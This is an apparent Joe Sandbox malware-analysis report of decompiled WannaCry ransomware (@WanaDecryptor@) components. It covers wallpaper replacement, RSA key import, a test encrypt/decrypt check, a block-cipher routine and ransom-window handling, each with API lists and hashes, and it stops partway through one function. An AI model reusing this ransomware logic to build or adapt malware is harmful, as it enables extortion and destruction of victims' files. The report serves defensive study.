                                  				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42);
                                  				_t23 = wcslen( &_v1060);
                                  				_t54 =  &_v1560 + 0x28;
                                  				if(_t23 != 0) {
                                  					_push(L"@WanaDecryptor@.bmp");
                                  					swprintf( &_v1580, L"%s\\%s",  &_v1060);
                                  					_t55 = _t54 + 0x10;
                                  					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
                                  					CopyFileW( &_v540, _t55, 0);
                                  					return SystemParametersInfoW(0x14, 0, _t55, 1);
                                  				} else {
                                  					return _t23;
                                  				}
                                  			}


                                  APIs
                                  • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
                                  • wcslen.MSVCRT ref: 00407EF4
                                  • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
                                  • SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
                                  • String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
                                  • API String ID: 13424474-2236924158
                                  • Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
                                  • Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
                                  • Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E004067F0(void* __ecx) {
                                  				signed int _v84;
                                  				void* _v88;
                                  				intOrPtr _v92;
                                  				intOrPtr _v96;
                                  				intOrPtr _v100;
                                  				char _v104;
                                  				int _t16;
                                  				int _t21;
                                  				int _t22;
                                  				int _t37;
                                  				struct tagRECT* _t48;
                                  				void* _t56;
                                  
                                  				_t56 = __ecx;
                                  				_t16 = IsIconic( *(__ecx + 0x20));
                                  				if(_t16 == 0) {
                                  					L00412CBC();
                                  					return _t16;
                                  				} else {
                                  					_push(_t56);
                                  					L00412DD0();
                                  					asm("sbb eax, eax");
                                  					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
                                  					_t21 = GetSystemMetrics(0xb);
                                  					_t22 = GetSystemMetrics(0xc);
                                  					_t48 =  &_v104;
                                  					GetClientRect( *(_t56 + 0x20), _t48);
                                  					asm("cdq");
                                  					asm("cdq");
                                  					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
                                  					L00412DB8();
                                  					return _t37;
                                  				}
                                  			}


                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                  • String ID:
                                  • API String ID: 1397574227-0
                                  • Opcode ID: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                  • Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
                                  • Opcode Fuzzy Hash: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
                                  • Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
                                  				void* _v4;
                                  				void* _v12;
                                  				char _v16;
                                  				void* _v20;
                                  				char _v24;
                                  				struct HWND__* _v32;
                                  				WCHAR* _v36;
                                  				struct HWND__* _t90;
                                  				signed int* _t100;
                                  				signed int _t102;
                                  				signed int _t105;
                                  				signed int* _t109;
                                  				signed int _t113;
                                  				signed int _t114;
                                  				signed int _t121;
                                  				void* _t124;
                                  				signed int _t130;
                                  				signed int _t132;
                                  				signed int _t138;
                                  				signed int _t143;
                                  				signed int _t152;
                                  				signed int _t157;
                                  				void* _t185;
                                  				void* _t188;
                                  				signed int* _t191;
                                  				void* _t204;
                                  				signed int _t206;
                                  				struct HWND__* _t207;
                                  				void* _t211;
                                  				void* _t212;
                                  				void* _t217;
                                  				void* _t218;
                                  				signed int _t221;
                                  				void* _t224;
                                  				signed int* _t226;
                                  				void* _t227;
                                  				void* _t228;
                                  
                                  				_t228 = _t227 - 0xc;
                                  				_t124 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                  					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  					_push(0x41c9c0);
                                  					_push( &_v16);
                                  					L004130FC();
                                  				}
                                  				_t206 = _a12;
                                  				_t185 = 0;
                                  				if(_t206 == 0) {
                                  					L26:
                                  					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
                                  					_push(0x41c9c0);
                                  					_push( &_v16);
                                  					L004130FC();
                                  					_push(_t206);
                                  					_t90 = FindWindowW(0, _v36); // executed
                                  					_t207 = _t90;
                                  					if(_t207 != 0) {
                                  						_push(_t185);
                                  						ShowWindow(_t207, 5);
                                  						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
                                  						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                  						SetForegroundWindow(_t207);
                                  						SetFocus(_t207);
                                  						SetActiveWindow(_t207);
                                  						BringWindowToTop(_t207);
                                  						_t90 = _v32;
                                  						if(_t90 != 0) {
                                  							ExitProcess(0);
                                  						}
                                  					}
                                  					return _t90;
                                  				} else {
                                  					_t130 =  *(_t124 + 0x3cc);
                                  					if(_t206 % _t130 != 0) {
                                  						goto L26;
                                  					} else {
                                  						_t100 = _a16;
                                  						if(_t100 != 1) {
                                  							L13:
                                  							_a16 = _t185;
                                  							if(_t100 != 2) {
                                  								L23:
                                  								_t102 = _t206 / _t130;
                                  								_t188 = _a4;
                                  								_t221 = _a8;
                                  								if(_t102 <= 0) {
                                  									goto L11;
                                  								} else {
                                  									do {
                                  										_push(_t221);
                                  										_push(_t188);
                                  										E0040B0C0(_t124);
                                  										_t132 =  *(_t124 + 0x3cc);
                                  										_t188 = _t188 + _t132;
                                  										_t221 = _t221 + _t132;
                                  										_a8 = _a8 + 1;
                                  										_t105 = _t206 / _t132;
                                  									} while (_a8 < _t105);
                                  									return _t105;
                                  								}
                                  							} else {
                                  								_t102 = _t206 / _t130;
                                  								_t191 = _a8;
                                  								_t224 = _a4;
                                  								_a4 = _t191;
                                  								if(_t102 <= 0) {
                                  									goto L11;
                                  								} else {
                                  									while(1) {
                                  										_t50 = _t124 + 0x3f0; // 0x444
                                  										_push(_t191);
                                  										E0040ADC0(_t124);
                                  										_t109 = _t191;
                                  										if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                  											break;
                                  										}
                                  										_t211 = 0;
                                  										if( *(_t124 + 0x3cc) > 0) {
                                  											do {
                                  												 *_t109 =  *_t109 ^  *(_t211 + _t224);
                                  												_t109 =  &(_t109[0]);
                                  												_t211 = _t211 + 1;
                                  											} while (_t211 <  *(_t124 + 0x3cc));
                                  										}
                                  										_t212 = _t224;
                                  										_t56 = _t124 + 0x3f0; // 0x444
                                  										_t138 =  *(_t124 + 0x3cc) >> 2;
                                  										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
                                  										_t228 = _t228 + 0x18;
                                  										_t143 =  *(_t124 + 0x3cc);
                                  										_t114 = _t113 / _t143;
                                  										_t224 = _t224 + _t143;
                                  										_v4 = _v4 + _t143;
                                  										_t206 = _a8 + 1;
                                  										_a8 = _t206;
                                  										if(_t206 < _t114) {
                                  											_t191 = _v4;
                                  											continue;
                                  										} else {
                                  											return _t114;
                                  										}
                                  										goto L31;
                                  									}
                                  									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  									_t130 =  &_v24;
                                  									_push(0x41c9c0);
                                  									_push(_t130);
                                  									L004130FC();
                                  									goto L23;
                                  								}
                                  							}
                                  						} else {
                                  							_t102 = _t206 / _t130;
                                  							_t226 = _a8;
                                  							_a16 = 0;
                                  							if(_t102 <= 0) {
                                  								L11:
                                  								return _t102;
                                  							} else {
                                  								while(1) {
                                  									_push(_t226);
                                  									_push(_a4);
                                  									E0040B0C0(_t124);
                                  									_t100 = _t226;
                                  									if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                  										break;
                                  									}
                                  									_t217 = 0;
                                  									if( *(_t124 + 0x3cc) > 0) {
                                  										_t22 = _t124 - _t226 + 0x3f0; // 0x444
                                  										_t204 = _t22;
                                  										do {
                                  											 *_t100 =  *_t100 ^  *(_t204 + _t100);
                                  											_t100 =  &(_t100[0]);
                                  											_t217 = _t217 + 1;
                                  										} while (_t217 <  *(_t124 + 0x3cc));
                                  									}
                                  									_t218 = _v4;
                                  									_t27 = _t124 + 0x3f0; // 0x444
                                  									_t152 =  *(_t124 + 0x3cc) >> 2;
                                  									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
                                  									_t228 = _t228 + 0x18;
                                  									_t157 =  *(_t124 + 0x3cc);
                                  									_t102 = _t121 / _t157;
                                  									_t185 = _v4 + _t157;
                                  									_t226 = _t226 + _t157;
                                  									_t206 = _a8 + 1;
                                  									_v4 = _t185;
                                  									_a8 = _t206;
                                  									if(_t206 < _t102) {
                                  										continue;
                                  									} else {
                                  										goto L11;
                                  									}
                                  									goto L31;
                                  								}
                                  								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  								_t130 =  &_v24;
                                  								_push(0x41c9c0);
                                  								_push(_t130);
                                  								L004130FC();
                                  								goto L13;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L31:
                                  			}


                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                  • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                  • Opcode Fuzzy Hash: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                  • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
                                  				long* _v8;
                                  				char _v20;
                                  				void _v539;
                                  				char _v540;
                                  				char _v543;
                                  				char _v544;
                                  				intOrPtr _v548;
                                  				char _v552;
                                  				int _v556;
                                  				intOrPtr _v560;
                                  				void* __ebx;
                                  				char _t38;
                                  				void* _t45;
                                  				void* _t48;
                                  				intOrPtr _t63;
                                  				intOrPtr _t67;
                                  				signed int _t76;
                                  				unsigned int _t78;
                                  				signed int _t79;
                                  				long* _t85;
                                  				char _t92;
                                  				void* _t116;
                                  				intOrPtr _t118;
                                  				void* _t120;
                                  				void* _t121;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x415e38);
                                  				_push(0x413050);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t118;
                                  				_t63 = __ecx;
                                  				_v560 = __ecx;
                                  				_t38 = "TESTDATA"; // 0x54534554
                                  				_v552 = _t38;
                                  				_t67 =  *0x420c64; // 0x41544144
                                  				_v548 = _t67;
                                  				_t92 =  *0x420c68; // 0x0
                                  				_v544 = _t92;
                                  				_v543 = 0;
                                  				_v540 = 0;
                                  				memset( &_v539, 0, 0x7f << 2);
                                  				_t120 = _t118 - 0x21c + 0xc;
                                  				asm("stosw");
                                  				asm("stosb");
                                  				asm("repne scasb");
                                  				_v556 = 0xbadbac;
                                  				if(E004046B0(_t63) == 0) {
                                  					L6:
                                  					 *[fs:0x0] = _v20;
                                  					return 0;
                                  				} else {
                                  					_v8 = 0;
                                  					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
                                  					_t121 = _t120 + 0xc;
                                  					if(_t45 == 0) {
                                  						L12:
                                  						_push(0xffffffff);
                                  						_push( &_v20);
                                  						goto L5;
                                  					} else {
                                  						_t76 = _a8;
                                  						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
                                  						_t121 = _t121 + 0xc;
                                  						if(_t48 == 0) {
                                  							goto L12;
                                  						} else {
                                  							asm("repne scasb");
                                  							_t78 =  !(_t76 | 0xffffffff);
                                  							_t116 =  &_v552 - _t78;
                                  							_t79 = _t78 >> 2;
                                  							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
                                  							_t121 = _t121 + 0x18;
                                  							_push(0x200);
                                  							_push( &_v556);
                                  							_push( &_v540);
                                  							_push(0);
                                  							_push(1);
                                  							_push(0);
                                  							_push( *((intOrPtr*)(_t63 + 8)));
                                  							if( *0x4217cc() != 0) {
                                  								_t85 =  *(_t63 + 0xc);
                                  								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
                                  									asm("repne scasb");
                                  									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
                                  										_v8 = 0xffffffff;
                                  										E004049A6(_t63);
                                  										goto L6;
                                  									} else {
                                  										_push(0xffffffff);
                                  										_push( &_v20);
                                  										L00413056();
                                  										 *[fs:0x0] = _v20;
                                  										return 1;
                                  									}
                                  								} else {
                                  									_push(0xffffffff);
                                  									_push( &_v20);
                                  									goto L5;
                                  								}
                                  							} else {
                                  								_push(0xffffffff);
                                  								_push( &_v20);
                                  								L5:
                                  								L00413056();
                                  								goto L6;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                    • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                    • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                    • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                  • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                  • _local_unwind2.MSVCRT ref: 004048EB
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
                                  • strncmp.MSVCRT(00000000,?), ref: 00404951
                                  • _local_unwind2.MSVCRT ref: 00404964
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                  • String ID: TESTDATA
                                  • API String ID: 154225373-1607903762
                                  • Opcode ID: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                  • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                  • Opcode Fuzzy Hash: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                  • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
                                  				int _v8;
                                  				char _v20;
                                  				long _v32;
                                  				int _v36;
                                  				long _v40;
                                  				void* _v44;
                                  				long _t24;
                                  				int _t28;
                                  				BYTE* _t35;
                                  				void* _t46;
                                  				long _t51;
                                  				intOrPtr _t53;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x415e48);
                                  				_push(0x413050);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t53;
                                  				_v44 = 0xffffffff;
                                  				_v32 = 0;
                                  				_v36 = 0;
                                  				_v8 = 0;
                                  				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
                                  				_v44 = _t46;
                                  				if(_t46 == 0xffffffff) {
                                  					L10:
                                  					_push(0xffffffff);
                                  					goto L11;
                                  				} else {
                                  					_t24 = GetFileSize(_t46, 0);
                                  					_t51 = _t24;
                                  					_v40 = _t51;
                                  					if(_t51 != 0xffffffff) {
                                  						if(_t51 <= 0x19000) {
                                  							_t35 = GlobalAlloc(0, _t51);
                                  							_v36 = _t35;
                                  							if(_t35 == 0) {
                                  								goto L10;
                                  							} else {
                                  								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
                                  									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
                                  									_push(0xffffffff);
                                  									if(_t28 == 0) {
                                  										L11:
                                  										_push( &_v20);
                                  										goto L12;
                                  									} else {
                                  										_push( &_v20);
                                  										L00413056();
                                  										 *[fs:0x0] = _v20;
                                  										return 1;
                                  									}
                                  								} else {
                                  									_push(0xffffffff);
                                  									_push( &_v20);
                                  									goto L12;
                                  								}
                                  							}
                                  						} else {
                                  							_push(0xffffffff);
                                  							_push( &_v20);
                                  							goto L12;
                                  						}
                                  					} else {
                                  						_push(_t24);
                                  						_push( &_v20);
                                  						L12:
                                  						L00413056();
                                  						 *[fs:0x0] = _v20;
                                  						return 0;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                  • _local_unwind2.MSVCRT ref: 00404AC7
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CreateSize_local_unwind2
                                  • String ID:
                                  • API String ID: 1039228802-0
                                  • Opcode ID: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                  • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                  • Opcode Fuzzy Hash: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                  • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00406C20(void* __ecx) {
                                  				void _v51;
                                  				void* _v52;
                                  				signed int _t14;
                                  				void* _t26;
                                  				char* _t30;
                                  				unsigned int _t36;
                                  				signed int _t37;
                                  				void* _t55;
                                  
                                  				_t26 = __ecx;
                                  				_v52 = 0;
                                  				memset( &_v51, 0, 0xc << 2);
                                  				asm("stosb");
                                  				_t14 = GetUserDefaultLangID();
                                  				_t30 =  &_v52;
                                  				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
                                  					asm("repne scasb");
                                  					_t36 =  !(_t30 | 0xffffffff);
                                  					_t55 = "English" - _t36;
                                  					_t37 = _t36 >> 2;
                                  					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
                                  				}
                                  				if(SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52) != 0xffffffff) {
                                  					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52);
                                  					return E00406AE0(_t26);
                                  				} else {
                                  					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
                                  					return E00406AE0(_t26);
                                  				}
                                  			}

                                  APIs
                                  • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                  • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                  • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                  • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                    • Part of subcall function 00406AE0: #540.MFC42(?,765920C0), ref: 00406B03
                                    • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,765920C0), ref: 00406B62
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                    • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
                                    • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                    • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                    • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                    • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,765920C0), ref: 00406BC4
                                    • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                    • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                  • String ID: English
                                  • API String ID: 600832625-3812506524
                                  • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                  • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                  • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E0040A150(void* __ecx) {
                                  				void* _t170;
                                  				void* _t177;
                                  				unsigned int _t178;
                                  				intOrPtr _t182;
                                  				signed int _t189;
                                  				signed int _t190;
                                  				signed int _t192;
                                  				signed int* _t198;
                                  				signed int* _t203;
                                  				signed int _t214;
                                  				signed int* _t215;
                                  				signed int _t224;
                                  				void* _t236;
                                  				unsigned int _t238;
                                  				signed int _t239;
                                  				signed int _t245;
                                  				signed int _t251;
                                  				void* _t268;
                                  				void* _t275;
                                  				signed int _t276;
                                  				void* _t278;
                                  				signed int _t290;
                                  				int _t292;
                                  				signed int _t293;
                                  				signed int _t317;
                                  				signed int _t321;
                                  				signed int _t337;
                                  				signed int _t353;
                                  				signed int _t355;
                                  				intOrPtr* _t375;
                                  				signed int _t378;
                                  				void* _t385;
                                  				void* _t386;
                                  				void* _t387;
                                  				signed int _t388;
                                  				signed int* _t390;
                                  				void* _t391;
                                  				void* _t392;
                                  				signed int _t395;
                                  				signed int* _t397;
                                  				intOrPtr _t398;
                                  				void* _t399;
                                  				void* _t403;
                                  
                                  				_t236 = __ecx;
                                  				if( *((intOrPtr*)(_t399 + 4)) == 0) {
                                  					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                  					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                  					_push(0x41c9c0);
                                  					_push(_t399 + 8);
                                  					L004130FC();
                                  				}
                                  				_t170 =  *(_t399 + 0x20);
                                  				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
                                  					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                  					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                  					_t170 = _t399 + 8;
                                  					_push(0x41c9c0);
                                  					_push(_t170);
                                  					L004130FC();
                                  				}
                                  				_t238 =  *(_t399 + 0x24);
                                  				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
